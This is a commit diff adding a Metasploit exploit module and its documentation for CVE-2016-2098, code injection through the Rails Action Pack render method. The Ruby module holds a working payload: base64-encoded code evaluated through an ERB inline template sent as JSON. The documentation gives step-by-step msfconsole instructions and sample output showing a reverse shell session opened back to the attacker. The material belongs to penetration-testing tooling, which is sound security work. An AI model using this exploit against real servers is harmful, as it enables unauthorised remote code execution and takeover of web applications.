Land #7026, Add Action Pack render exploit CVE-2016-2098
This commit is contained in:
commit
d0e1c67c18
|
@ -0,0 +1,43 @@
|
|||
rails_actionpack_inine_exec is a module that exploits the render method in Action Pack.
|
||||
Applications that pass unverified user input to the ```render``` method in a controller
|
||||
or view may be vulnerable to code injection.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Action Pack versions prior to 3.2.22.2, 4.1.14.2, and 4.2.5.2 use unsafe dynamic rendering.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Assuming you have the right requirements to run a rails server, you can use the following fork
|
||||
to set up the vulnerable server for testing:
|
||||
|
||||
1. Do: ```git clone https://github.com/wchen-r7/dh-CVE_2016_2098.git```
|
||||
2. Do: ```bundle install```
|
||||
3. Do: ```rails -s -b 0.0.0.0```
|
||||
4. Start msfconsole
|
||||
5. Do: ```use exploit/multi/http/rails_actionpack_inline_exec```
|
||||
6. Do: ```set RHOST [rails server IP]```
|
||||
7. Do: ```set RPORT 3000```. 3000 is the default port for the rails server.
|
||||
8. Do: ```set targeturi /exploits```
|
||||
9. Configure the rest of the options (for the modules or the payload)
|
||||
10. Do: ```exploit```, and you should get a session:
|
||||
|
||||
```
|
||||
msf exploit(rails_actionpack_inline_exec) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.146.1:4444
|
||||
[*] Sending inline code to parameter: id
|
||||
[*] Command shell session 1 opened (192.168.146.1:4444 -> 192.168.146.161:56661) at 2016-07-07 15:56:00 -0500
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
To use this module, you must manually discover the correct values for these datastore options:
|
||||
|
||||
**TARGETURI**
|
||||
|
||||
The path to a vulnerable Ruby on Rails application.
|
||||
|
||||
**TARGETPARAM**
|
||||
|
||||
The target parameter to inject with inline code.
|
|
@ -0,0 +1,70 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Ruby on Rails ActionPack Inline ERB Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a remote code execution vulnerability in the
|
||||
inline request processor of the Ruby on Rails ActionPack component.
|
||||
This vulnerability allows an attacker to process ERB to the inline
|
||||
JSON processor, which is then rendered, permitting full RCE within
|
||||
the runtime, without logging an error condition.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'RageLtMan <rageltman[at]sempervictus>'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2016-2098' ]
|
||||
],
|
||||
'Platform' => 'ruby',
|
||||
'Arch' => ARCH_RUBY,
|
||||
'Privileged' => false,
|
||||
'Targets' => [ ['Automatic', {} ] ],
|
||||
'DisclosureDate' => 'Mar 1 2016',
|
||||
'DefaultOptions' => {
|
||||
"PrependFork" => true
|
||||
},
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80),
|
||||
OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
|
||||
OptString.new('TARGETPARAM', [ true, 'The target parameter to inject with inline code', 'id'])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def json_request
|
||||
code = Rex::Text.encode_base64(payload.encoded)
|
||||
return {
|
||||
datastore['TARGETPARAM'] => {"inline" => "<%= eval(%[#{code}].unpack(%[m0])[0]) %>"}
|
||||
}.to_json
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Sending inline code to parameter: #{datastore['TARGETPARAM']}")
|
||||
send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path),
|
||||
'method' => 'GET',
|
||||
'ctype' => 'application/json',
|
||||
'headers' => {
|
||||
'Accept' => 'application/json'
|
||||
},
|
||||
'data' => json_request
|
||||
}, 25)
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue